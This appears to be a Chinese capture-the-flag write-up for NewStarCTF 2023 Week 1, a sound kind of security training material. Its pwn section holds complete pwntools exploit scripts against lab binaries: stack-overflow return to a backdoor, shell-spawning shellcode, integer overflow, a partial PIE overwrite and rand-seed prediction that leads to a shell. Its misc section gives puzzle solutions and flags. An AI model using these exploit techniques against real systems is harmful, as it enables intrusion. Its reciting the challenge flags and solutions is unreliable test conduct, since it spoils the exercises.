NewStarCTF 2023 Week1

pwn:

ret2text:

简单的栈溢出题,没开canary和pie,有后门地址,直接溢出返回后门地址getshell

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./ret2text')
p=remote('node4.buuoj.cn',26822)
elf=ELF('./ret2text')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

sla('Show me your magic\n',b'a'*0x28+p64(0x4011fb))


p.interactive()

ezshellcode:

没开沙箱什么的,写入长度也够长,写入0x66660000,0x66660000权限全开最后会jmp到0x66660000运行,因此直接写入shellcraft.sh()即可getshell。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./ezshellcode')
p=remote('node4.buuoj.cn',28654)
elf=ELF('./ezshellcode')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

shellcode=asm(shellcraft.sh())
sl(shellcode)

p.interactive()

newstar shop:

整数溢出,买到shell才能getshell,但要9999,我们只有100,但是是int类型,在比较时又会变成unsorted int类型,如果我们减到负数,就能够购买shell了。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./shop')
p=remote('node4.buuoj.cn',26635)
elf=ELF('./shop')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

sl(b'1')
sl(b'1')
sl(b'1')
sl(b'2')
sl(b'3')
sl(b'1')
sl(b'3')

p.interactive()

p1eee:

有个后门函数地址,但开了pie,还有个溢出,gdb调试发现返回地址跟后门函数就相差一个字节,因此覆盖最后一个字节即可

返回地址:

image-20230926140844537

后门函数地址:
image-20230926141010776

但由于栈平衡问题,要0x1269。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./p1eee')
p=remote('node4.buuoj.cn',26772)
elf=ELF('./p1eee')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

sa('pie!!!\n',b'a'*0x28+b'\x69')

p.interactive()

Random:

利用time的时间戳做随机数种子,但我们自己就能拿到这个时间戳,所以第一步的“随机”就不存在了,

而后面的一步就不是我们能操控的了,会执行一个system(command),不过当command随机到“$“1和2时这个command就可以用我们输入的参数决定了。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *
from ctypes import *
import time
context(log_level='debug',arch='amd64',os='linux')
p=process('./random')
p=remote('node4.buuoj.cn',28598)
dll = cdll.LoadLibrary("./libc-2.31.so")
elf=ELF('./random')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

time_seed=int(time.time())
seed = dll.srand(time_seed)
rand = str(dll.rand())
sla('number?\n',rand)

p.interactive()

运行:python random1.py /bin/sh /bin/sh

此时的第一和第二个参数就都是/bin/sh了

misc:

CyberChef’s Secret:

编码题

根据题目名字直接拿去赛博厨子跑一下:
image-20230925112204194

可以看到是经过base32,base58和base64

flag:flag{Base_15_S0_Easy_^_^}

机密图片:

图片隐写

Png图片,拿去zsteg一下,直接出flag:

image-20230925112549039

flag:flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

流量!鲨鱼!:

流量题

导出http对象,结合响应包是200的看到有个文件名是“.ffffllllllll11111144444GGGGGG|base64”

下载下来是个经过编码的字符串:Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

拿去base64一下

image-20230925113752267

flag:flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们:

出现一串base64字符:

image-20230925114433469

image-20230925114413323

猜测是压缩包密码提示

发现应该是个压缩包,但前面字节得改成“50 4B 03 04”

提取出flag.zip

提取损坏,结合前面的6位数,猜测是改了加密位,补回去后爆破一下

image-20230925181658693

image-20230925181630353

flag:flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

隐秘的眼睛:

根据题目名应该是silent eyes

image-20230925120233778

flag:flag{R0ck1ng_y0u_63b0dc13a591}

空白格:

一堆空格和tab,说明是whitespace,找个解密工具解一下:

Whitelips the Esoteric Language IDE (vii5ard.github.io)

image-20230925122729844

flag:flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}